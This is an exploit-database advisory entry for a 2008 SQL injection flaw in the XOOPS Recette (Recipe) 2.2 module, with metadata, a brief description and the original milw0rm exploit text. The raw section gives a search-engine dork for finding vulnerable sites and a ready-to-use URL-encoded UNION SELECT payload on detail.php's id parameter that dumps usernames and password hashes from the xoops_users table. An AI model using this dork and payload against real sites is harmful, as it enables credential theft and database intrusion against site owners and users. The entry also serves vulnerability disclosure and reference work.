XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability

vendor:

XOOPS Project-Recette(Recipe)

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: XOOPS Project-Recette(Recipe)

Affected Version From: 2.2

Affected Version To: 2.2

Patch Exists: YES

Related CWE: N/A

CPE: a:xoops:xoops_project-recette

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability

A vulnerability exists in XOOPS Project-Recette(Recipe)2.2 which allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'detail.php' script. The attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of XOOPS Project-Recette(Recipe)2.2

Source

Exploit-DB raw data:

##########################################
#
# XOOPS Project-Recette(Recipe)2.2 SQL Injection Vulnerability
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÃL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl :"modules/recipe"
#
###########################################
EXPLOIT :

modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*

###########################################
Submitter: sbruchet
Publisher: Cba
Updated On: 2006/03/06

Version: 2.2
Downloads: 2853
File Size: 162 bytes
Home Page: Not Specified

download link:
http://www.xoops.org/modules/repository/singlefile.php?cid=43&
;lid=1524

###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-04-19]